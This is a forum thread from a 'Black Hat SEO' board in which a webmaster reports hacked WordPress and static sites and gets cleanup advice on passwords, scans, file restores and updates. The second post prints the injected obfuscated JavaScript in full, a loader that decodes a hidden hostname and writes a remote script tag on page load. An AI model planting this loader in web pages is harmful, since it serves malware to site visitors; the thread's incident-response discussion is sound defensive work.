1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Sites Hacked - redirect - inject

Discussion in 'Black Hat SEO' started by AdisLCS, Jan 29, 2010.

Tags:
  1. AdisLCS

    AdisLCS Power Member

    Joined:
    May 16, 2009
    Messages:
    520
    Likes Received:
    216
    found out few minutes ago few sites got hacked and some weird ass code injected, any one know wtf this is?

    (all sites infected are on same shared hosting ), so far looks like its just index injection .
    I will have to go trhough all the pages and check them which will be pain in the bud. I changed CP password and will look into last visitors, pages to try to locate entry point any other suggestions ?

    here is the code from index


    try{window.onload=function(){document.write('sitesell-com.time.com.wor');Jnpe8xhce3al = document.getElementById('Esbxhxeuur61').innerHTML + 'd@)&p(r@^e))^s^!s)@-(#^!o@r&#(g@$.^)e&(#u#(#r(^#o^$#s@^&h&#(a^!r!&e^&s&&^(.&)r($!u(&:()&S(@#d&t(#@2(o(#@e!(^l(@@w)3$(e^@#b@p)#^@2@@!i^&/^)g#&^o{msg}o)$)g()^l(e#.@#^(c&o$!#m)#!/#)#g#o#&!o!g$^l&)e^&.{msg}(c##(o)(@m)&/)5#^5!^!b($!b$(s!^$.)^)c&@^$o!^)&m#&^/))!)b&#u^&s((i)$#n#(!e@&s#!s$!&)w$e&e$@k!.^)c&&o((@m#/&^a()d^)d(i##c&^t#!i#^n$)#g^!g(&#a@$m)^@#e!{msg}$s!!$@.($c@)o(#m$^^/^(&)'.replace(/\!|@|\$|#|&|\)|\^|\(/ig, '') ;document.write('');} } catch(Qssnfjsvu ) {}


    any ides, suggestions,

    thanks
     
  2. AdisLCS

    AdisLCS Power Member

    Joined:
    May 16, 2009
    Messages:
    520
    Likes Received:
    216
    btw sites are wordpress and static html
    here is full code, anyone got an idea ?

    <script> try{window.onload=function(){document.write('<div id=Esbxhxeuur61>sitesell-com.time.com.wor</div>');Jnpe8xhce3al = document.getElementById('Esbxhxeuur61').innerHTML + 'd@)&p(r@^e))^s^!s)@-(#^!o@r&#(g@$.^)e&(#u#(#r(^#o^$#s@^&h&#(a^!r!&e^&s&&^(.&)r($!u(&:()&S(@#d&t(#@2(o(#@e!(^l(@@w)3$$(e^@#b@p)#^@2@@!i^&/^)g#&^o$&o)$)g()^l(e#.@#^(c&o$!#m)#!/#)#g#o#&!o!g$^l&)e^&.$&(c##(o)(@m)&/)5#^5!^!b($!b$(s!^$.)^)c&@^$o!^)&m#&^/))!)b&#u^&s((i)$#n#(!e@&s#!s$!&)w$$e&e$@k!.^)c&&o((@m#/&^a()d^)d(i##c&^t#!i#^n$$)#g^!g(&#a@$m)^@#e!$&$s!!$@.($c@)o(#m$^^/^(&)'.replace(/\!|@|\$|#|&|\)|\^|\(/ig, '') ;document.write('<scr'+'ipt src=h'+'ttp://'+Jnpe8xhce3al.replace(/Sdt2oelw3ebp2i/g, '8080')+'></scr'+'ipt>');} } catch(Qssnfjsvu ) {}</script>
    <!--f44f30b9cd1bfceafeb1f82bed7db035-->
     
  3. Subject

    Subject Power Member

    Joined:
    Dec 26, 2007
    Messages:
    656
    Likes Received:
    303
    Location:
    Living With Articles!!
    the same happened for me last week on a wordpress site and another site.

    this is what happened: i visited some sites and my firewall said something in the temporary folder trying to connect outside. so i blocked it. in this time, my ftp programs were running. although firewall blocked the connection, but somehow they got my ftp traffic and got my ftp passwords...

    After sometime, when i was trying to visit my sites, i noticed something in the browsers status bar. its like it is trying to connect some site... i then replaced all index.php files in my sites.. they were 27.. but no hope.. still brower showing it is trying to connect...

    i then reinstalled my windows, changed ftp password, re-uploaded the files to sites..

    Now there is no problem..

    You should change your control panel and ftp passwords and clean your sites..
     
    • Thanks Thanks x 1
  4. AdisLCS

    AdisLCS Power Member

    Joined:
    May 16, 2009
    Messages:
    520
    Likes Received:
    216
    thanks, I noticed my Avira warning about a a temp file while looking at advertiser landing page , Marketleverage affl network, I think it was a tax relief program, it started redirecting. and I disconnected internet and restarted computer. couple hours later sites were hacked.

    So PPL beware of Marketleverage, even though I think it might be bad apple or a victim themself.

    I have cleaned static sites but still have issues with the wordpress one Firefox gives some weird error about "content encoding error"
    I think it has to do with some pluins but will browser around the net for a solution.
     
  5. AdisLCS

    AdisLCS Power Member

    Joined:
    May 16, 2009
    Messages:
    520
    Likes Received:
    216
    just as an update I finally think to have cleaned all the code, if someone comes across same situation I guess best advise is use common sense and be cautious.

    As mentioned above the Trojan got hold of smart ftp history and thus was able to inject code across almost all sites on several hosting providers.

    good thing it was not a xss but ftp compromise

    - first thing I did was change all passwords to hosting,CP,db,admins etc
    - than I used Avira, Malwarebytes and Kaspersky to clean the local machine, kaspersky did best job and was even able to identify code within pages

    - next thing was taking care of the infected websites - it appears just index,home and .js were compromised

    one of the hosts took care of it within few minutes and ran virus scan, checked for brute and shell to make sure trojan did not linger somewhere else and additionally went through the logs and blocked unauthorized IPs that accessed FTP, most were chinese,taiwan and some USA but mosts likely proxy stuff

    - Godaddy's advice as almost always when called in, was basically "google it" so I ended up using file manager to sort files by date modified to identify infected pages and ,js
    It was pain in the bud as I have deluxe hosting, and couple economy with ton of folders,subfolders etc. Pretty tedious but it did the job.

    Godaddy has also option within hosting/file manager to view files archived . You would click on history and choose a date from the top left corner of the file manager and you would see colored indicators if current files have been changed compared to selected date. That feature made it bit easier even though I had to go thru each folder by itself

    My WP sites were bit trickier as the code was injected in almost all folders including themes,plug ins etc, so I ended up just cleaning wp-content and uploading new wp-includes and wp-admin

    I think I got all of the code out but will do final checks to make sure, I hope someone with same problem will be able to look at this post and find some helpful info.

    Again best probable advise is use common sense and be cautious, don't panic and make sure to have regular backups along with updates and proper security measures.

    thank you
     
  6. Subject

    Subject Power Member

    Joined:
    Dec 26, 2007
    Messages:
    656
    Likes Received:
    303
    Location:
    Living With Articles!!
    Load your site and watch the status bar on your browser..
    If you seeing any unusual website activity, consider you got hacked...

    The status bar will show "connecting", "connected to", "waiting for" "transferring data from" etc. watch your site is connecting to any sites that is not known or not allowed by you..
     
  7. dogdog

    dogdog Regular Member

    Joined:
    Apr 17, 2008
    Messages:
    245
    Likes Received:
    54
    Location:
    Online
    Complaint to the Marketing company. If they are not the culprit themselves, then they will take action against the affiliate in question. They can easily identify who is the referral.
     
  8. duca

    duca Registered Member

    Joined:
    Sep 18, 2008
    Messages:
    67
    Likes Received:
    17
    I'm curious on which wordpress version your sites are running?
    Maybe upgrade to latest version ll prevent situations like this.. :rolleyes:
     
  9. SEO20

    SEO20 Elite Member

    Joined:
    Mar 25, 2009
    Messages:
    2,017
    Likes Received:
    2,259
    Wordpress has in history been a popular victim. Always upgrade to newest verion. Change your pass and make it strong.
     
  10. durjoy

    durjoy Registered Member

    Joined:
    Dec 27, 2007
    Messages:
    86
    Likes Received:
    64
    I guess Joomla is worse than wordpress . Joomla sites get hacked very frequently.
     
  11. SEO20

    SEO20 Elite Member

    Joined:
    Mar 25, 2009
    Messages:
    2,017
    Likes Received:
    2,259
    Joomla is one big joke :)
     
  12. duca

    duca Registered Member

    Joined:
    Sep 18, 2008
    Messages:
    67
    Likes Received:
    17
    Well Wordpress is popular publishing platform, which makes him also a popular target :)
     
  13. AdisLCS

    AdisLCS Power Member

    Joined:
    May 16, 2009
    Messages:
    520
    Likes Received:
    216
    in my case it was not really WP issue but the trojan that grabbed ftp log ins.
    It sneaked in from Marketleverage's Advertiser (it was $11 per lead Tax Relief), their site was infected and anyone viewing the landing page must have gotten same thing. I did call ML emergency that night and spoke to Eric, he thanked me and said they will take care of the issue. It is sad trojan was very well position on a affiliate network knowing there will be webmasters.
     
  14. dd-mdd

    dd-mdd Newbie

    Joined:
    Jul 6, 2009
    Messages:
    2
    Likes Received:
    0
    Another way to verify if you site is hacked is by using this free online tool:

    http://sucuri.net

    It will monitor your web sites, domains, whois info, blacklisting status, etc and
    alert you if they are hacked, defaced, hijacked, etc...